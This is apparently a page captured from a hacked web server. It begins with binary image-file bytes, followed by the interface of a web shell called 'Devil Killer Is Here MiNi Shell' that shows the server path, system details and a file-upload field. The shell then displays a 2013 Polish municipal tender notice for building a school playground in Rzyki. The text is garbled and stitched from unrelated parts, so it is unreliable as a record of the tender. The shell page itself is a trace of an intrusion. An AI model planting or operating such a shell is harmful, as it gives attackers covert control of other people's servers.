JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130327/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130327/121422-N-2013.html

<p class="kh_header"><b>Andrychów: Budowa placu zabaw przy ZSS w Rzykach w ramach rządowego programu RADOSNA SZKOŁA</b><br>
<b>Numer ogłoszenia: 121422 - 2013; data zamieszczenia: 27.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Andrychów reprezentowana przez Burmistrza , Rynek 15, 34-120 Andrychów, woj. małopolskie, tel. (0-33) 875-23-60, faks (0-33) 875-29-16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.andrychow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa placu zabaw przy ZSS w Rzykach w ramach rządowego programu RADOSNA SZKOŁA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest  wykonanie zadania w  trybie zaprojektuj  i  wybuduj pn.: Budowa placu zabaw przy ZSS w Rykach w ramach rządowego programu Radosna Szkoła.
1. Przedmiot zamówienia obejmuje 
a)  wykonanie usługi w zakresie projektowania.
W zakres dokumentacji projektowej wchodzi: 
-koncepcja funkcjonalno - użytkowa w dwóch wariantach realizacyjnych,
-mapa zasadnicza dla terenu objętego opracowaniem, niezbędna do wykonania prac
 projektowych,
-wypis i wyrys z planu zagospodarowania przestrzennego,
-dokumentacja geologiczna,
-wstępne oszacowanie kosztów realizacji inwestycji
-uzgodnienia branżowe, warunki techniczne,
-projekt zagospodarowania terenu,
-projekt budowlany i wykonawczy placu zabaw,
-projekt odwodnienia,
-specyfikacje techniczne dla poszczególnych branż,
-przedmiary robót w rozbiciu na poszczególne branże,
-kosztorysy inwestorskie w rozbiciu na poszczególne branże.
Szczegółowy zakres prac projektowych przedstawia załącznik nr 1 do Umowy program funkcjonalno - użytkowy.
b)  wykonanie  robót budowlanych na  podstawie sporządzonej  i zatwierdzonej  przez  Zamawiającego dokumentacji projektowej.
c)  wykonanie innych prac i robót niezbędnych do prawidłowego wykonania zamówienia, w tym między innymi:
- oznakowanie oraz zabezpieczenie przejętego placu budowy na czas robót,
- organizację zaplecza budowy,
- nadzory specjalistyczne zarządców sieci wynikające z uzgodnień,
- badania zagęszczenia warstw konstrukcyjnych nawierzchni,
- bieżący wywóz materiałów nieużytecznych z terenu budowy,
- ubezpieczenie budowy na czas jej realizacji,
- wykonanie ewentualnych robót  naprawczych  infrastruktury technicznej,  której stan techniczny na skutek  realizacji robót uległ pogorszeniu.
Przedmiot zamówienia należy zaprojektować i wykonać zgodnie z programem rządowym Radosna Szkoła oraz Rozporządzeniem Rady Ministrów z dnia 7 lipca 2009 r. ( Dz. U. 2009 r. Nr 110 poz. 915) w sprawie form i zakresu finansowego wspierania organów prowadzących w zapewnieniu bezpiecznych warunków nauki, wychowania i opieki w klasach I - III szkół podstawowych i ogólnokształcących szkół muzycznych I stopnia w szczególności w zakresie:
 1.sprzętów rekreacyjnych, które zostaną zainstalowane na placach zabaw tj. ich zgodności z Polskimi Normami oraz zasadami i warunkami bezpieczeństwa, okresu ich gwarancji oraz materiałów, z jakich są wykonane,
  2.wymiarów i rodzaju nawierzchni, na której zostanie ten sprzęt zainstalowany, jej koloru oraz amortyzacji upadku.
Założenia do programu rządowego są zamieszczone na stronie internetowej Ministerstwa Edukacji Narodowej pod adresem strony internetowej: www.radosnaszkola.men.gov.pl  
Zamówienie zostanie zrealizowane w trzech etapach:
Etap I - opracowanie w dwóch wariantach realizacyjnych koncepcji projektowej zagospodarowania terenu wraz z programem funkcjonalno-użytkowym placu zabaw ze wstępnym oszacowaniem kosztów realizacji inwestycji. Zamawiający w terminie do 14 dni od daty otrzymania do akceptacji, wybierze i zatwierdzi do realizacji jeden wariant koncepcji projektowej. Zatwierdzona przez Zamawiającego koncepcja stanowić będzie podstawę do wykonania dokumentacji projektowo-kosztorysowej.   
Etap II - wykonanie kompletnej dokumentacji projektowo-kosztorysowej wraz z potwierdzeniem przyjęcia zgłoszenia robót budowlanych przez właściwy organ administracji architektoniczno - budowlanej (jeśli obowiązuje).
Etap III - wykonanie robót budowlanych na podstawie sporządzonej dokumentacji projektowo-kosztorysowej, obejmujące następujący zakres::
-  kompleksowe wykonanie placu zabaw z wyposażeniem i montażem urządzeń zabawowo-sportowych,
- umieszczenie czytelnej tablicy informacyjnej pokazującej możliwości i sposób wykorzystania każdego urządzenia, tak aby osoby, pod których opieką dzieci będą przebywały po zajęciach lekcyjnych, mogły zagwarantować bezpieczne korzystanie z tych urządzeń,
- umieszczenie tablicy zawierającej informacje pn: SZKOLNY PLAC ZABAW WYPOSAŻONY W RAMACH PROGRAMU RZĄDOWEGO RADOSNA SZKOŁA
- umieszczenie regulaminu określającego zasady i warunki korzystania ze szkolnego placu zabaw z uwzględnieniem zakazu wprowadzania zwierząt na teren ogródka, zakazu palenia wyrobów tytoniowych oraz spożywania napojów alkoholowych, itp. Treść regulaminu przed wykonaniem i montażem należy uzgodnić z Zamawiającym,
- przekazanie Zamawiającemu gotowych do użytkowania obiektów wraz z dokumentacją zawierającą atesty, aprobaty bądź certyfikaty niezbędne do przeprowadzenia kontroli przez firmę wskazaną przez MEN oraz rozpoczęcia eksploatacji placu zabaw,
- wykonania innych prac i robót niezbędnych do prawidłowego wykonania zamówienia.
Warunki realizacji przedmiotu zamówienia:
1. Wykonawca zobowiązuje się wykonać przedmiot zamówienia zgodnie z zasadami współczesnej wiedzy technicznej, obowiązującymi normami, przepisami i normatywami.
2. Zamawiający ma prawo zapoznania się z przebiegiem i postępem prac na każdym etapie realizacji zamówienia w terminie i w miejscu wskazanym przez Zamawiającego. 
3. Po zaakceptowaniu przez Zamawiającego wariantu koncepcji projektowej Wykonawca niezwłocznie złoży wnioski o uzyskanie wymaganych przepisami prawa decyzji i uzgodnień i powiadomi o tym Zamawiającego przedkładając kserokopie złożonych wniosków z potwierdzoną datą złożenia. 
4. Wykonawca ponosi pełną odpowiedzialność za poprawność techniczną rozwiązań stosowanych w wykonanej przez siebie dokumentacji i ich pełną zgodność z przepisami prawa polskiego. 
5. Wykonawca oświadcza, że posiada niezbędne uprawnienia do wykonywania przedmiotu zamówienia i zapewnia osoby posiadające stosowne uprawnienia projektowe.
6. Zamawiający zobowiązany jest udostępnić dokumenty i dane związane z wykonaniem prac projektowych, będące w posiadaniu Zamawiającego, a mogące mieć wpływ na ułatwienie prac projektowych oraz poprawienie ich jakości. Wszelkie materiały przekazane Wykonawcy podlegają zwrotowi do Zamawiającego w terminie odbioru prac objętych etapem I.
7. Wykonawca nie może bez zgody Zamawiającego przekazać praw i obowiązków, wynikających z umowy w całości na osoby trzecie. Wykonawca odpowiada bez ograniczeń za prace wykonane przez podwykonawców, niezbędne do realizacji przedmiotu umowy.
8. Wykonawca w dokumentacji projektowo-kosztorysowej nie może wskazywać znaków towarowych, patentów lub pochodzenia materiałów, urządzeń i wyposażenia, z wyjątkiem sytuacji, gdy jest to uzasadnione specyfiką przedmiotu zamówienia i jednocześnie gdy nie może użyć w opisie dostatecznie dokładnych określeń. a wskazaniu takiemu towarzyszą wyrazy lub równoważne. W przypadku zastosowania stwierdzenia lub równoważne Wykonawca jest zobowiązany określić cechy (parametry, kryteria) równoważności. Przy sporządzaniu dokumentacji projektowo-kosztorysowej Wykonawca jest zobowiązany do stosowania przepisów ustawy Prawo zamówień publicznych zakresie opisu przedmiotu zamówienia zgodnie art. 29 ust. 3 PZP. Wykonawca winien dokonać oględzin nieruchomości, na której będą wykonywane roboty, sprawdzić zakres i rodzaj robót objętych zamówieniem i uwzględnić powyższe w oferowanej cenie.
9. Przekazanie placu budowy nastąpi w terminie w terminie do 10 dni  kalendarzowych po otrzymaniu przez Zamawiającego pełnej dokumentacji  projektowo-kosztorysowej.
10. O rozpoczęciu robót Wykonawca winien powiadomić właścicieli istniejącego w rejonie budowy uzbrojenia podziemnego w celu zapewnienia z ich strony ewentualnego nadzoru technicznego oraz uzyskania pozwolenia na zajęcie pasa drogowego. Wykonawca we własnym zakresie pokryje koszty nadzoru właścicieli sieci wg uzgodnień.
11. Roboty budowlane należy wykonać z zachowaniem szczególnej staranności, zgodnie z dokumentacją projektową, specyfikacjami technicznymi wykonania i odbioru robót, obowiązującymi warunkami technicznymi, Polskimi Normami Budowlanymi oraz z zaleceniami Zamawiającego. Wykonawca ponosi pełną odpowiedzialność za szkody spowodowane niewłaściwym wykonawstwem lub nieprzestrzeganiem przepisów. Podczas realizacji robót wymagane jest przestrzeganie przez Wykonawcę przepisów bezpieczeństwa i  higieny pracy oraz zabezpieczenie przed dostępem osób postronnych terenu budowy i przechowywanych tam materiałów budowlanych.
12. Wykonawca urządzi zaplecze budowy we własnym zakresie i poniesie koszty z tym związane.
13. Wykonawca zabezpieczy plac budowy i wykona oznakowanie miejsca robót.
14. Od dnia protokolarnego przekazania placu budowy Wykonawca odpowiada za organizację swojego zaplecza oraz ponosi pełną odpowiedzialność za teren budowy i szkody wyrządzone Zamawiającemu i osobom trzecim. W przypadku zniszczenia lub uszkodzenia w toku realizacji umowy urządzeń lub obiektów budowlanych osób trzecich zobowiązuje się Wykonawcę do naprawienia ich w terminie uzgodnionym z Zamawiającym i poszkodowanym. Wykonawca ponosi konsekwencje wynikłe z nieterminowego ich naprawienia.
15. Wszystkie materiały i urządzenia użyte do wykonania zamówienia muszą posiadać aktualne gwarancje, świadectwa, aprobaty lub certyfikaty dopuszczające do stosowania w budownictwie.
16. Wykonawca zapewni sprawowanie kierownictwa budowy i robót przez osoby posiadające odpowiednie kwalifikacje zawodowe i uprawnienia do prowadzenia prac w poszczególnych specjalnościach. Za koordynację robót branżowych i prowadzenie dokumentacji budowy odpowiadać będzie kierownik budowy branży konstrukcyjno-budowlanej.
17. Zamawiający dopuszcza użycie innych równoważnych materiałów, technologii i urządzeń niż wskazane w dokumentacji projektowej (jeżeli ich opisanie w dokumentacji nastąpiło poprzez wskazanie znaków towarowych, patentów lub pochodzenia) lecz muszą one spełniać wszystkie normy oraz być o parametrach nie gorszych od wskazanych w dokumentacji projektowej, za zgodą projektanta i pod warunkiem złożenia stosownych dokumentów, uwiarygodniających te materiały i urządzenia w celu aprobaty Zamawiającego. Wykonawca jest zobowiązany przedłożyć Zamawiającemu odpowiednie atesty, certyfikaty, gwarancje, aprobaty techniczne dotyczące zastosowanych materiałów i urządzeń, przed ich zastosowaniem.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 45.11.27.23-9, 45.00.00.00-7, 44.40.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca  złoży oświadczenie o spełnianiu warunków na formularzu według wzoru jak w załączniku nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże (na formularzu wg wzoru jak w załączniku nr 4 do SIWZ), że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -w tym okresie, wykonał co najmniej 3 roboty budowlane polegające na budowie placu zabaw o wartości powyżej 100. 000,00 zł brutto każda.
Ocena zostanie dokonana na podstawie złożonego wykazu robót budowlanych wykonanych w okresie ostatnich pięciu lat  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Dowodami są poświadczenia lub referencje lub inne dokumenty, jeżeli    z uzasadnionych przyczyn o obiektywnym charakterze Wykonawce nie jest w stanie uzyskać poświadczenia.
W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego roboty budowlane wskazane w wykazie, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże na formularzu według wzoru jak w załączniku nr 5 do SIWZ, że dysponuje co najmniej:
- jedną osobą z uprawnieniami do projektowania w specjalności architektonicznej lub w specjalności konstrukcyjno - budowlanej z  minimum 2-letnim doświadczeniem, zgodnie z art.13 ust.1 pkt 1 oraz art.14 ust1 pkt1 ustawy z dnia 7 lipca 1994r. - Prawo budowlane  (Dz. U. z 2010r. Nr 243 poz. 1623 z późn. zmian.) lub odpowiadającymi wydanymi na podstawie wcześniejszych przepisów. 
- jedną osobą z uprawnieniami do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej z minimum 2-letnim doświadczeniem, zgodnie z art. 13 ust. 1 pkt. 2 oraz art. 14 ust. 1 pkt 2 ustawy z dnia 7 lipca 1994r. - Prawo budowlane  (Dz. U. z 2010r. Nr 243 poz. 1623 z późn. zmian.) lub odpowiadającymi wydanymi na podstawie wcześniejszych przepisów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże na formularzu według wzoru jak w załączniku nr 5 do SIWZ, że dysponuje co najmniej:
- jedną osobą z uprawnieniami do projektowania w specjalności architektonicznej lub w specjalności konstrukcyjno - budowlanej z  minimum 2-letnim doświadczeniem, zgodnie z art.13 ust.1 pkt 1 oraz art.14 ust1 pkt1 ustawy z dnia 7 lipca 1994r. - Prawo budowlane  (Dz. U. z 2010r. Nr 243 poz. 1623 z późn. zmian.) lub odpowiadającymi wydanymi na podstawie wcześniejszych przepisów. 
- jedną osobą z uprawnieniami do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej z minimum 2-letnim doświadczeniem, zgodnie z art. 13 ust. 1 pkt. 2 oraz art. 14 ust. 1 pkt 2 ustawy z dnia 7 lipca 1994r. - Prawo budowlane  (Dz. U. z 2010r. Nr 243 poz. 1623 z późn. zmian.) lub odpowiadającymi wydanymi na podstawie wcześniejszych przepisów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 100.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy - według wzoru - załącznik nr 1 do SIWZ.
2. Listę podmiotów należących do tej samej grupy kapitałowej w rozumieniu Ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331 z późn. zm.) w przypadku, gdy Wykonawca należy do grupy kapitałowej.
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres wykonywania przedmiotu zamówienia.
Pisemne zobowiązanie podmiotu trzeciego należy załączyć do oferty w formie oryginału, zawierające podpis podmiotu trzeciego pod treścią oświadczenia.
Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.
Dotyczy Wykonawców składających wspólna ofertę: 
W przypadku wspólnego ubiegania się o udzielenie zamówienia Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Dokumenty, o których mowa w SIWZ w dziale VI pkt. A 1, 2, 3, 4 oraz pkt. C 1 składają wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia lub ich pełnomocnik.
Dokumenty, o których mowa w SIWZ w dziale VI pkt. B 1, 2, 3, 4 oraz pkt C 2 składa we własnym imieniu każdy z podmiotów wspólnie ubiegający się o udzielenie zamówienia</p>

